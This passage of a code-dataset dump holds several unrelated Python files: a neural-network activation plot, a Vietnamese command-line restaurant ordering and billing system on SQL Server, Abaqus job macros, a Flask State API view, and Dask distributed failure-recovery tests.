int for the %s unit but got %s\" % (to_layer, to_unit)\n assert 0 <= to_unit < net[to_layer].size, \"no such %s layer unit: %d\" % (to_layer, to_unit)\n\n if colormap is None: colormap = get_colormap()\n if plt is None:\n raise Exception(\"matplotlib was not loaded\")\n act_min, act_max = net[from_layer].get_act_minmax() if act_range is None else act_range\n out_min, out_max = net[to_layer].get_act_minmax()\n if resolution is None:\n resolution = (act_max - act_min) / 50 # 50x50 pixels by default\n xmin, xmax, xstep = act_min, act_max, resolution\n ymin, ymax, ystep = act_min, act_max, resolution\n xspan = xmax - xmin\n yspan = ymax - ymin\n xpixels = int(xspan/xstep)+1\n ypixels = int(yspan/ystep)+1\n mat = np.zeros((ypixels, xpixels))\n ovector = net[from_layer].make_dummy_vector(default_from_layer_value)\n for row in range(ypixels):\n for col in range(xpixels):\n # (x,y) corresponds to lower left corner point of pixel\n x = xmin + xstep*col\n y = ymin + ystep*row\n vector = copy.copy(ovector)\n vector[ix] = x\n vector[iy] = y\n activations = net.propagate_from(from_layer, vector, to_layer, visualize=False)\n mat[row,col] = activations[to_unit]\n fig, ax = plt.subplots()\n axim = ax.imshow(mat, origin='lower', cmap=colormap, vmin=out_min, vmax=out_max)\n ax.set_title(\"Activation of %s[%s]\" % (to_layer, to_unit))\n ax.set_xlabel(\"%s[%s]\" % (from_layer, ix))\n ax.set_ylabel(\"%s[%s]\" % (from_layer, iy))\n ax.xaxis.tick_bottom()\n ax.set_xticks([i*(xpixels-1)/4 for i in range(5)])\n ax.set_xticklabels([xmin+i*xspan/4 for i in range(5)])\n ax.set_yticks([i*(ypixels-1)/4 for i in range(5)])\n ax.set_yticklabels([ymin+i*yspan/4 for i in range(5)])\n cbar = fig.colorbar(axim)\n plt.show(block=False)\n # optionally print out a table of activation values\n if show_values:\n s = '\\n'\n for y in np.linspace(act_max, act_min, 20):\n for x in np.linspace(act_min, act_max, 20):\n vector = [default_from_layer_value] * net[from_layer].size\n vector[ix] = x\n vector[iy] = y\n out = net.propagate_from(from_layer, vector, to_layer)[to_unit]\n s += '%4.2f ' % out\n s += '\\n'\n separator = 100 * '-'\n s += separator\n print(\"%s\\nActivation of %s[%d] as a function of %s[%d] and %s[%d]\" %\n (separator, to_layer, to_unit, from_layer, ix, from_layer, iy))\n print(\"rows: %s[%d] decreasing from %.2f to %.2f\" % (from_layer, iy, act_max, act_min))\n print(\"cols: %s[%d] increasing from %.2f to %.2f\" % (from_layer, ix, act_min, act_max))\n print(s)\n\n","sub_path":"conx/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"27113940","text":"import pyodbc \r\nimport datetime\r\nconn = pyodbc.connect('Driver={SQL Server};'\r\n\t\t\t\t\t\t'Server=ADMIN\\KAITO;'\r\n\t\t\t\t\t\t'Database=QuanLyNhaHang;'\r\n\t\t\t\t\t\t'Trusted_Connection=yes;')\r\nclass menu():\r\n\tdef __init__(self,idfood,food,count):\r\n\t\tself.idfood=idfood\r\n\t\tself.food=food\r\n\t\tself.count=count\r\ndef giaodienmenu():\r\n\tcursorMenu= conn.cursor()\r\n\tcursorMenu.execute('SELECT * FROM Food')\r\n\tprint (\"ID\\t\\t\\tFOOD\\t\\t\\tPRICE\")\r\n\tprint (\"---------------------------------------------------------------\")\r\n\tfor i in cursorMenu:\r\n\t\tprint (\"%s\\t\\t\\t%s\\t\\t\\t%d\" % (i[0],i[1],i[2]))\r\n\tprint (\"---------------------------------------------------------------\")\r\ndef giaodiengoimon():\r\n\tcursorTable=conn.cursor()\r\n\tkt=0\r\n\tcursorTable.execute('SELECT * FROM TableFood WHERE status=0')\r\n\tfor i in cursorTable:\r\n\t\tkt=kt+1\r\n\tif(kt==0):\r\n\t\tprint(\"Tất cả các bàn đều có người vui lòng quay lại sau.\")\r\n\telse:\r\n\t\tcursorTable.execute('SELECT * FROM TableFood')\r\n\t\tprint (\"ID\\t\\t\\tNAME\\t\\tSTATUS\")\r\n\t\tprint (\"---------------------------------------------------------------\")\r\n\t\tfor i in cursorTable:\r\n\t\t\tif(i[2]==0):\r\n\t\t\t\tstatus=\"Trống\"\r\n\t\t\telse:\r\n\t\t\t\tstatus=\"Có người\"\r\n\t\t\tprint (\"%s\\t\\t\\t%s\\t\\t%s\" % (i[0],i[1],status))\r\n\t\tprint (\"---------------------------------------------------------------\")\r\n\t\tkt=True\r\n\t\twhile(kt):\r\n\t\t\tMaTable=int(input(\"Nhập ID bàn bạn muốn đặt: \"))\r\n\t\t\tcursorTable.execute('SELECT * FROM TableFood WHERE id=(?)',(MaTable))\r\n\t\t\tkiemtra=0\r\n\t\t\tfor i in cursorTable:\r\n\t\t\t\tkiemtra=kiemtra+1\r\n\t\t\t\tif(i[2]==0):\r\n\t\t\t\t\tkt=False\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint(\"Bàn bạn đặt đã có người vui lòng nhập lại ID bàn bạn muốn đặt.\")\r\n\t\t\tif(not kt):\r\n\t\t\t\tprint(\"Bạn đã đặt bàn thành công\")\r\n\t\t\t\tcursorTable.execute('UPDATE TableFood SET status=1 WHERE id=(?)',(MaTable))\r\n\t\t\t\tconn.commit()\r\n\t\t\tif(kiemtra==0):\r\n\t\t\t\tprint(\"Không ID này trong nhà hàng.Vui lòng nhập lại!\")\r\n\t\tgiaodienmenu()\r\n\t\ttongtien=0\r\n\t\tcursorBill=conn.cursor()\r\n\t\tcursorCount=conn.cursor()\r\n\t\tcursorBillInfo=conn.cursor()\r\n\t\tcursorMenu= conn.cursor()\r\n\t\tcursorBill.execute('INSERT INTO Bill(idTable,CheckIn,Checkout,Totalprice,status) VALUES (?,?,?,?,?)',(MaTable,datetime.datetime.today(),'',tongtien,0))\r\n\t\tconn.commit()\r\n\t\tdsmenu=[]\r\n\t\twhile(True):\r\n\t\t\tprint(\"Nhập 1: để gọi món\")\r\n\t\t\tprint(\"Nhập 2: để chốt hoá đơn\")\r\n\t\t\tprint(\"Nhập 3: Exit\")\r\n\t\t\ttest=int(input(\"Nhập lựa chọn: \"))\r\n\t\t\tif(test==1):\r\n\t\t\t\twhile(True):\r\n\t\t\t\t\tMaFood=int(input(\"Nhập ID món ăn bạn muốn gọi: \"))\r\n\t\t\t\t\tcursorMenu.execute('SELECT id,name FROM Food WHERE id=(?)',(MaFood))\r\n\t\t\t\t\tkt=0\r\n\t\t\t\t\tfor i in cursorMenu:\r\n\t\t\t\t\t\tNameFood=i[1]\r\n\t\t\t\t\t\tkt=kt+1\r\n\t\t\t\t\tif(kt==0):\r\n\t\t\t\t\t\tprint(\"Nhập sai ID vui lòng nhập lại!\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\twhile(True):\r\n\t\t\t\t\tsoluong=int(input(\"Nhập số lượng bạn muốn gọi: \"))\r\n\t\t\t\t\tif(soluong<1):\r\n\t\t\t\t\t\tprint(\"Số lượng không thể nhỏ hơn 1! Vui lòng nhập lại.\")\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tMondagoi=menu(MaFood,NameFood,soluong)\r\n\t\t\t\t\t\tdsmenu.append(Mondagoi)\r\n\t\t\t\t\t\tcursorCount.execute('SELECT count FROM Food WHERE id=(?)',(MaFood))\r\n\t\t\t\t\t\tfor i in cursorCount:\r\n\t\t\t\t\t\t\tDem=i[0]\r\n\t\t\t\t\t\tDem=Dem+soluong\r\n\t\t\t\t\t\tcursorCount.execute('UPDATE Food SET count=(?) WHERE id=(?)',(Dem,MaFood))\r\n\t\t\t\t\t\tconn.commit()\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tprint(\"Đặt món thành công.\")\r\n\t\t\t\tcursorMenu.execute('SELECT * FROM Food WHERE id=(?)',(MaFood))\r\n\t\t\t\tfor i in cursorMenu:\r\n\t\t\t\t\ttongtien=tongtien+i[2]*soluong\r\n\t\t\t\tcursorBill.execute('SELECT id FROM Bill WHERE idTable=(?) and status=0',(MaTable))\r\n\t\t\t\tfor i in cursorBill:\r\n\t\t\t\t\tidBill=i[0]\r\n\t\t\t\tcursorBill.execute('UPDATE Bill SET Totalprice=(?) WHERE id=(?)',(tongtien,idBill))\r\n\t\t\t\tconn.commit()\r\n\t\t\telif(test==2):\r\n\t\t\t\tif(tongtien==0):\r\n\t\t\t\t\tprint(\"Bạn chưa chọn món nào để chốt hoá đơn!\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint (\"IdTable\\t\\t\\tNAME\\t\\tSoLuong\")\r\n\t\t\t\t\tfor i in dsmenu:\r\n\t\t\t\t\t\tprint(\"%d\\t\\t\\t%s\\t\\t%d\" %(i.idfood,i.food,i.count))\r\n\t\t\t\t\tprint(\"Tổng tiền của bạn là:\"+str(tongtien)+\" VND\")\r\n\t\t\telif(test==3):\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Nhập sai vui lòng nhập lại lựa chọn!\")\r\ndef thaydoi():\r\n\tgiaodienmenu()\r\n\tcursorMenu= conn.cursor()\r\n\tkt=True\r\n\twhile(kt):\r\n\t\tcursorMenu.execute('SELECT id FROM Food')\r\n\t\tmaFood=int(input(\"Chọn ID món bạn muốn thay đổi giá: \"))\r\n\t\tfor i in cursorMenu:\r\n\t\t\tif(i[0]==maFood):\r\n\t\t\t\tkt=False\r\n\t\t\t\tbreak\r\n\t\tif(kt==True):\r\n\t\t\tprint(\"Không có ID này vui lòng nhập lại!\")\r\n\twhile(True):\r\n\t\tgia=int(input(\"Nhập giá mà bạn muốn đổi: \"))\r\n\t\tif(gia<1):\r\n\t\t\tprint(\"Giá không hợp lí vui lòng nhập lại!\")\r\n\t\telse:\r\n\t\t\tbreak\r\n\tcursorMenu.execute('UPDATE Food SET price=(?) WHERE id=(?)',(gia,maFood))\r\n\tconn.commit()\r\n\tprint(\"Thay đổi giá món ăn thành công.\")\t\r\n\tgiaodienmenu()\r\ndef suamenu():\r\n\tgiaodienmenu()\r\n\twhile(True):\r\n\t\tcursorMenu= conn.cursor()\r\n\t\tcursorBillInfo=conn.cursor()\r\n\t\tprint(\"1:Xoá món ăn\")\r\n\t\tprint(\"2:Thêm món ăn\")\r\n\t\tprint(\"3:Exit\")\r\n\t\ttest=int(input(\"Nhập lựa chọn: \"))\r\n\t\tif(test==1):\r\n\t\t\tkt=True\r\n\t\t\twhile(kt):\r\n\t\t\t\tcursorMenu.execute('SELECT id FROM Food')\r\n\t\t\t\tmaFood=int(input(\"Nhập ID món ăn bạn muốn xoá: \"))\r\n\t\t\t\tfor i in cursorMenu:\r\n\t\t\t\t\t\tif(i[0]==maFood):\r\n\t\t\t\t\t\t\tkt=False\r\n\t\t\t\tif(kt):\r\n\t\t\t\t\tprint(\"Không có ID này vui lòng nhập lại!\")\r\n\t\t\twhile(True):\r\n\t\t\t\tcheck=input(\"Bạn đã chắc chắn muốn xoá dữ liệu này không(Y/N): \")\r\n\t\t\t\tif(check=='Y' or check=='y'):\r\n\t\t\t\t\tcursorMenu.execute('DELETE FROM Food WHERE id=(?)',(maFood))\r\n\t\t\t\t\tconn.commit()\r\n\t\t\t\t\tprint(\"Đã xoá thành công.\")\r\n\t\t\t\t\tgiaodienmenu()\r\n\t\t\t\t\tbreak\r\n\t\t\t\telif(check=='N' or check=='n'):\r\n\t\t\t\t\tbreak\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint(\"Nhập sai vui lòng nhập lại.\")\r\n\t\telif(test==2):\r\n\t\t\tkt=True\r\n\t\t\tNUll=0\r\n\t\t\twhile(kt):\r\n\t\t\t\tcursorMenu.execute('SELECT id FROM Food')\r\n\t\t\t\tmaFood=int(input(\"Nhập ID món bạn muốn thêm: \"))\r\n\t\t\t\tfor i in cursorMenu:\r\n\t\t\t\t\tNUll=NUll+1\r\n\t\t\t\t\tif(i[0]==maFood):\r\n\t\t\t\t\t\tprint(\"Nhập lại ID, ID đã tồn tại!\")\r\n\t\t\t\t\t\tkt=True\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tkt=False\r\n\t\t\t\tif(NUll==0):\r\n\t\t\t\t\tbreak\r\n\t\t\tkt=True\r\n\t\t\twhile(kt):\r\n\t\t\t\tmonan=input(\"Nhập tên món ăn bạn muốn thêm: \")\r\n\t\t\t\tif(monan==''):\r\n\t\t\t\t\tprint(\"Vui lòng nhập tên món ăn!\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tNUll=0\r\n\t\t\t\t\tcursorMenu.execute('SELECT name FROM Food')\r\n\t\t\t\t\tfor i in cursorMenu:\r\n\t\t\t\t\t\tNUll=NUll+1\r\n\t\t\t\t\t\tif(i[0]==monan):\r\n\t\t\t\t\t\t\tprint('Tên này đã có trong menu.Vui lòng nhập lại!')\r\n\t\t\t\t\t\t\tkt=True\r\n\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tkt=False\r\n\t\t\t\t\tif(NUll==0):\r\n\t\t\t\t\t\tbreak\r\n\t\t\twhile(True):\r\n\t\t\t\tgia=int(input(\"Nhập giá món ăn: \"))\r\n\t\t\t\tif(gia<1):\r\n\t\t\t\t\tprint(\"Giá không hợp lý vui lòng nhập lại!\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tbreak\r\n\t\t\tcursorMenu.execute(\"INSERT INTO Food(id,name,price) VALUES (?,?,?)\",(maFood,monan,gia))\r\n\t\t\tconn.commit()\r\n\t\t\tprint(\"Thêm món ăn thành công.\")\r\n\t\t\tgiaodienmenu()\r\n\t\telif(test==3):\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"Không có lựa chọn này vui lòng chọn lại!\")\r\ndef dangnhap():\r\n\tcursorAcc=conn.cursor()\r\n\tkt=True\r\n\twhile(kt):\r\n\t\tcursorAcc.execute('SELECT * FROM Account')\r\n\t\twhile (True):\r\n\t\t\taccount=input(\"Nhập tên đăng nhập:\")\r\n\t\t\tif(account==''):\r\n\t\t\t\tprint('Vui lòng nhập tên đăng nhập!')\r\n\t\t\telse:\r\n\t\t\t\tbreak\r\n\t\twhile(True):\r\n\t\t\tpassword=input(\"Nhập mật khẩu:\")\r\n\t\t\tif(password==''):\r\n\t\t\t\tprint('Vui lòng nhập mật khẩu!')\r\n\t\t\telse:\r\n\t\t\t\tbreak\r\n\t\tfor i in cursorAcc:\r\n\t\t\tif(account==i[0] and password==i[1]):\r\n\t\t\t\tkt=False\r\n\t\tif(kt):\t\r\n\t\t\tprint(\"Tài khoản hoặc mật khẩu của ban bị sai,vui lòng nhập lại!\")\r\n\tgiaodienAdmin()\r\ndef giaodienAdmin():\r\n\twhile(True):\r\n\t\tprint(\"1:Xem menu\")\r\n\t\tprint(\"2:Đặt món,chọn bàn\")\r\n\t\tprint(\"3:Thay đổi giá của món ăn\")\r\n\t\tprint(\"4:Thay đổi menu\")\r\n\t\tprint(\"5:Xem hoá đơn chưa thanh toán\")\r\n\t\tprint(\"6:Xem tổng doanh thu trong ngày\")\r\n\t\tprint(\"7:Exit\")\r\n\t\ttest=int(input(\"Nhập lựa chọn của bạn: \"))\r\n\t\tif(test==1):\r\n\t\t\tgiaodienmenu()\r\n\t\telif(test==2):\r\n\t\t\tgiaodiengoimon()\r\n\t\telif(test==3):\r\n\t\t\tthaydoi()\r\n\t\telif(test==4):\r\n\t\t\tsuamenu()\r\n\t\telif(test==5):\r\n\t\t\tBill()\r\n\t\telif(test==6):\r\n\t\t\tcheckDoanhthu()\r\n\t\telif(test==7):\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"Nhập sai vui lòng nhập lại.\")\r\ndef giaodienKhach():\r\n\twhile(True):\r\n\t\tprint(\"1:Xem menu\")\r\n\t\tprint(\"2:Đặt món,chọn bàn\")\r\n\t\tprint(\"3:Exit\")\r\n\t\ttest=int(input(\"Nhập lựa chọn của bạn: \"))\r\n\t\tif(test==1):\r\n\t\t\tgiaodienmenu()\r\n\t\telif(test==2):\r\n\t\t\tgiaodiengoimon()\r\n\t\t\tbreak\r\n\t\telif(test==3):\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"Nhập sai vui lòng nhập lại.\")\r\ndef Bill():\r\n\tcursorTable=conn.cursor()\r\n\tTable={}\r\n\tcursorTable.execute('SELECT id,name FROM TableFood')\r\n\tfor i in cursorTable:\r\n\t\tTable[i[0]]=i[1]\r\n\twhile(True):\r\n\t\tcursorBill=conn.cursor()\r\n\t\tcursorMenu=conn.cursor()\r\n\t\tcursorBill.execute('SELECT * FROM Bill WHERE status=0' )\r\n\t\tprint (\"ID\\t\\t\\tNAME_TABLE\\tCheckIn\\t\\t\\t\\t\\t\\tTotal_Price\")\r\n\t\tfor i in cursorBill:\r\n\t\t\tprint (\"%d\\t\\t\\t%s\\t\\t%s\\t\\t\\t%d\" % (i[0],Table[i[1]],i[2],i[4]))\r\n\t\tprint(\"1:Chọn hoá đơn thanh toán\")\r\n\t\tprint(\"2:Thoát\")\r\n\t\ttest=int(input(\"Nhập lựa chọn của bạn: \"))\r\n\t\tif(test==1):\r\n\t\t\tkt=True\r\n\t\t\twhile(kt):\r\n\t\t\t\tcursorBill.execute('SELECT * FROM Bill WHERE status=0')\r\n\t\t\t\tmaBill=int(input(\"Chọn ID hoá đơn thanh toán: \"))\r\n\t\t\t\tfor i in cursorBill:\r\n\t\t\t\t\tif(maBill==i[0]):\r\n\t\t\t\t\t\tkt=False\r\n\t\t\t\t\t\tMaTable=i[1]\r\n\t\t\t\tif(kt==True):\r\n\t\t\t\t\tprint(\"Nhập sai ID vui lòng nhập lại.\")\r\n\t\t\tcursorBill.execute('SELECT Totalprice FROM Bill WHERE id=(?)',maBill)\r\n\t\t\tfor i in cursorBill:\r\n\t\t\t\tprint(\"Tổng tiền hoá đơn là:\",i[0])\r\n\t\t\tcursorBill.execute('UPDATE Bill SET Checkout=(?),status=(?) WHERE id=(?)',(datetime.datetime.today(),1,maBill))\r\n\t\t\tconn.commit()\r\n\t\t\tcursorTableFood=conn.cursor()\r\n\t\t\tcursorTableFood.execute('UPDATE TableFood SET status=(?) WHERE id=(?)',(0,MaTable))\r\n\t\t\tconn.commit()\r\n\t\telif(test==2):\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"Nhập sai vui lòng nhập lại.\")\r\ndef checkDoanhthu():\r\n\tcursorBill=conn.cursor()\r\n\twhile(True):\r\n\t\tprint(\"1:Xem doanh thu của ngày hôm nay\")\r\n\t\tprint(\"2:Xem doanh thu của tháng\")\r\n\t\tprint(\"3:Xem doanh thu của quý\")\r\n\t\tprint(\"4:Exit\")\r\n\t\ttest=int(input(\"Nhập lựa chọn của bạn: \"))\r\n\t\tif(test==1):\r\n\t\t\tcursorBill.execute('SELECT Totalprice FROM Bill WHERE status=1 And day(Checkout)=(?) and month(Checkout)=(?) and year(Checkout)=(?)',(datetime.date.today().day,datetime.date.today().month,datetime.date.today().year))\r\n\t\t\tTongdoanhso=0\r\n\t\t\tfor i in cursorBill:\r\n\t\t\t\tTongdoanhso=Tongdoanhso+i[0]\r\n\t\t\tprint(\"Tổng doanh số ngày hôm nay là: \",Tongdoanhso,\"VND\")\r\n\t\telif(test==2):\r\n\t\t\twhile(True):\r\n\t\t\t\tthang=int(input(\"Nhập tháng bạn muốn xem: \"))\r\n\t\t\t\tif(thang<=0 or thang>12):\r\n\t\t\t\t\tprint(\"Nhập tháng sai vui lòng nhập lại!\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tbreak\r\n\t\t\tTongdoanhso=0\r\n\t\t\tcursorBill.execute('SELECT Totalprice FROM Bill WHERE status=1 and month(Checkout)=(?) and year(Checkout)=(?)',(thang,datetime.date.today().year))\r\n\t\t\tfor i in cursorBill:\r\n\t\t\t\tTongdoanhso=Tongdoanhso+i[0]\r\n\t\t\tprint(\"Doanh số của tháng \"+str(thang)+\" là:\",Tongdoanhso,\"VND\")\r\n\t\telif(test==3):\r\n\t\t\twhile(True):\r\n\t\t\t\tquy=int(input(\"Nhập quý bạn muốn xem: \"))\r\n\t\t\t\tif(quy<=0 or quy>4):\r\n\t\t\t\t\tprint(\"Nhập sai quý vui lòng nhập lại!\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tbreak\r\n\t\t\tthang=quy*3\r\n\t\t\tTongdoanhso=0\r\n\t\t\tfor x in range(0,3):\r\n\t\t\t\tcursorBill.execute('SELECT Totalprice FROM Bill WHERE status=1 and month(Checkout)=(?) and year(Checkout)=(?)',(thang,datetime.date.today().year))\r\n\t\t\t\tfor i in cursorBill:\r\n\t\t\t\t\tTongdoanhso=Tongdoanhso+i[0]\r\n\t\t\t\tthang=thang-1\r\n\t\t\tprint(\"Doanh số của quý \"+str(quy)+\" là:\",Tongdoanhso,\"VND\")\r\n\t\telif(test==4):\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"Nhập sai vui lòng nhập lại.\")\r\ndef giaodienBandau():\r\n\twhile(True):\r\n\t\tprint(\"1:Đăng nhập để quản lý nhà hàng.\")\r\n\t\tprint(\"2:Là Khách hàng muốn xem menu và gọi món.\")\r\n\t\ttest=int(input(\"Nhập lựa chọn: \"))\r\n\t\tif(test==1):\r\n\t\t\tdangnhap()\r\n\t\t\tbreak\r\n\t\telif(test==2):\r\n\t\t\tgiaodienKhach()\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tprint(\"Nhập sai vui lòng nhập lại.\")\r\ngiaodienBandau()","sub_path":"B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":12169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"496441715","text":"\"\"\" Macros functions to be used in Abaqus environment.\n abaqusMacros.cfg file is expected to be in the same folder as\n this script.\n Ideally, put both in the /site folder of your Abaqus installation,\n otherwise you could place them in the working directory, but if\n the interpreter switches to another directory, it won't be able\n to read the macros.\n \n Developed by Rodrigo Rivero.\n https://github.com/rodrigo1392\"\"\"\nfrom __future__ import print_function\n# -*- coding: mbcs -*-\n# Do not delete the following import lines\nfrom abaqus import *\nfrom abaqusConstants import *\nimport __main__\nimport ConfigParser as configparser\n\n\n# Config input file\nconfig_file_path = __file__.replace('.py', '.cfg').replace('.pyc', '.cfg').replace('.cfgc', '.cfg')\ncfg = configparser.ConfigParser()\ncfg.read(config_file_path)\n\n\n# Extract input data and process it\nCPUS_NUMBER = eval(cfg.get('MACROS', 'CPUS_NUMBER'))\nprint('CPUS_NUMBER:', CPUS_NUMBER)\n\n\ndef jobs_create_4all_models():\n \"\"\"\n Creates a Job for every Model in the Database, if it doesn`t exist yet,\n with the assigned characteristics.\n \"\"\"\n global CPUS_NUMBER\n for model_key, model in mdb.models.items():\n # Replace all blank spaces for underscores\n model_name = model_key.replace(' ', '_')\n # Create the Job using each Model name\n if model_name not in mdb.jobs.keys():\n jobs_create_4all_models_with_overwrite()\n return\n\n\ndef jobs_create_4all_models_with_overwrite():\n \"\"\"\n Creates a Job for every Model in the Database, with the\n assigned characteristics.\n \"\"\"\n global CPUS_NUMBER\n for model_key, model in mdb.models.items():\n # Replace all blank spaces for underscores\n model_name = model_key.replace(' ', '_')\n # Create the Job using each Model name\n mdb.Job(name=str(model_name), model=model, description='',\n type=ANALYSIS, atTime=None, waitMinutes=0, waitHours=0,\n queue=None, memory=90, memoryUnits=PERCENTAGE,\n getMemoryFromAnalysis=True, explicitPrecision=SINGLE,\n nodalOutputPrecision=SINGLE, echoPrint=OFF, modelPrint=OFF,\n contactPrint=OFF, historyPrint=OFF, userSubroutine='',\n scratch='', resultsFormat=ODB, multiprocessingMode=DEFAULT,\n numCpus=CPUS_NUMBER, numDomains=CPUS_NUMBER)\n return\n\n\ndef jobs_run_all():\n \"\"\" Runs all the Jobs contained in the Database, one at a time. \"\"\"\n jobs_count = 1\n for job_key, job in mdb.jobs.items():\n job.submit(consistencyChecking=OFF)\n print('Job number ', str(jobs_count), ' of: ', str(len(mdb.jobs)))\n job.waitForCompletion()\n jobs_count += 1\n return\n\n\ndef jobs_run_not_completed():\n \"\"\" Runs all Jobs contained in the Database which status in not\n COMPLETED, one at a time. \"\"\"\n jobs_count = 1\n for job_key, job in mdb.jobs.items():\n if job.status != COMPLETED:\n job.submit(consistencyChecking=OFF)\n print('Job number ', str(jobs_count))\n job.waitForCompletion()\n jobs_count += 1\n return\n\n\ndef models_replace_blank_spaces():\n \"\"\" Replaces all blank spaces in the names of the Models\n present in the current Database for underscores. \"\"\"\n for model_key in mdb.models.keys():\n mdb.models.changeKey(fromName=model_key,\n toName=model_key.replace(\" \", \"_\"))\n return\n\n\ndef odbs_close_all_odbs():\n \"\"\" Closes all Odbs that are open on the current Session. \"\"\"\n for odb_key, odb in session.odbs.items():\n odb.close()\n return\n\n\ndef xydata_clean_all_xydata():\n \"\"\" Erases all xyData from the current Session \"\"\"\n for xydata_key, xydata in session.xyDataObjects.items():\n del xydata\n return\n\n\ndef xyplots_clean_all_xyplots():\n \"\"\" Erases all xyPlots from the current Session. \"\"\"\n for xyplot_key, xyplot in session.xyPlots.items():\n del xyplot\n return\n","sub_path":"abaqusMacros.py","file_name":"abaqusMacros.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"122439620","text":"#!/usr/bin/python3\n\"\"\"States module\"\"\"\nfrom api.v1.views import app_views\nfrom flask import jsonify, abort, make_response, request\nfrom models import storage\nfrom models.state import State\n\n\n@app_views.route('/states', methods=['GET'], strict_slashes=False)\n@app_views.route('/states/', methods=['GET'])\ndef all_states(state_id=None):\n \"\"\"Returns all state objects handeling states id\"\"\"\n states = []\n for value in storage.all(State).values():\n states.append(value.to_dict())\n if not state_id:\n return jsonify(states)\n get_state = storage.get(State, state_id)\n if get_state is None:\n abort(404)\n return jsonify(get_state.to_dict())\n\n\n@app_views.route('/states/', methods=['DELETE'])\ndef delete_state(state_id=None):\n \"\"\"Deletes a state objects by id\"\"\"\n get_state = storage.get(State, state_id)\n if get_state is not None:\n storage.delete(get_state)\n storage.save()\n return make_response(jsonify({}), 200)\n abort(404)\n\n\n@app_views.route('/states', methods=['POST'], strict_slashes=False)\ndef creates_state():\n \"\"\"Creates a state object\"\"\"\n get_states = request.get_json()\n if not get_states:\n abort(400, 'Not a JSON')\n elif 'name' not in get_states:\n abort(400, 'Missing name')\n new_obj = State(name=get_states['name'])\n storage.new(new_obj)\n storage.save()\n return jsonify(new_obj.to_dict()), 201\n\n\n@app_views.route('/states/', methods=['PUT'])\ndef update_state(state_id=None):\n \"\"\"Updates a state objects by id\"\"\"\n state = storage.get(State, state_id)\n if not state:\n abort(404)\n\n get_states = request.get_json()\n if not get_states:\n abort(400, 'Not a JSON')\n\n for key, value in get_states.items():\n if key not in [\"id\", \"created_at\", \"updated_at\"]:\n setattr(state, key, value)\n state.save()\n return jsonify(state.to_dict()), 200\n","sub_path":"api/v1/views/states.py","file_name":"states.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"201413903","text":"from __future__ import print_function, division, absolute_import\n\nfrom concurrent.futures import CancelledError\nfrom operator import add\nfrom time import time, sleep\n\nfrom dask import delayed\nimport pytest\nfrom toolz import partition_all\nfrom tornado import gen\n\nfrom distributed.executor import _wait\nfrom distributed.utils import sync\nfrom distributed.utils_test import (gen_cluster, cluster, inc, loop, slow, div,\n slowinc, slowadd)\nfrom distributed import Executor, Nanny, wait\n\n\ndef test_submit_after_failed_worker(loop):\n with cluster() as (s, [a, b]):\n with Executor(('127.0.0.1', s['port']), loop=loop) as e:\n L = e.map(inc, range(10))\n wait(L)\n a['proc'].terminate()\n total = e.submit(sum, L)\n assert total.result() == sum(map(inc, range(10)))\n\n\ndef test_gather_after_failed_worker(loop):\n with cluster() as (s, [a, b]):\n with Executor(('127.0.0.1', s['port']), loop=loop) as e:\n L = e.map(inc, range(10))\n wait(L)\n a['proc'].terminate()\n result = e.gather(L)\n assert result == list(map(inc, range(10)))\n\n\n@slow\ndef test_gather_then_submit_after_failed_workers(loop):\n with cluster(nworkers=4) as (s, [w, x, y, z]):\n with Executor(('127.0.0.1', s['port']), loop=loop) as e:\n L = e.map(inc, range(20))\n wait(L)\n w['proc'].terminate()\n total = e.submit(sum, L)\n wait([total])\n\n (_, port) = first(e.scheduler.who_has[total.key])\n for d in [x, y, z]:\n if d['port'] == port:\n d['proc'].terminate()\n\n result = e.gather([total])\n assert result == [sum(map(inc, range(20)))]\n\n\n@gen_cluster(Worker=Nanny, timeout=60, executor=True)\ndef test_failed_worker_without_warning(e, s, a, b):\n L = e.map(inc, range(10))\n yield _wait(L)\n\n a.process.terminate()\n start = time()\n while not a.process.is_alive():\n yield gen.sleep(0.01)\n assert time() - start < 10\n\n yield gen.sleep(0.5)\n\n start = time()\n while len(s.ncores) < 2:\n yield gen.sleep(0.01)\n assert time() - start < 10\n\n yield _wait(L)\n\n L2 = e.map(inc, range(10, 20))\n yield _wait(L2)\n assert all(len(keys) > 0 for keys in s.has_what.values())\n ncores2 = s.ncores.copy()\n\n yield e._restart()\n\n L = e.map(inc, range(10))\n yield _wait(L)\n assert all(len(keys) > 0 for keys in s.has_what.values())\n\n assert not (set(ncores2) & set(s.ncores)) # no overlap\n\n\n@gen_cluster(Worker=Nanny, executor=True)\ndef test_restart(e, s, a, b):\n assert s.ncores == {a.worker_address: 1, b.worker_address: 2}\n\n x = e.submit(inc, 1)\n y = e.submit(inc, x)\n z = e.submit(div, 1, 0)\n yield y._result()\n\n assert set(s.who_has) == {x.key, y.key}\n\n f = 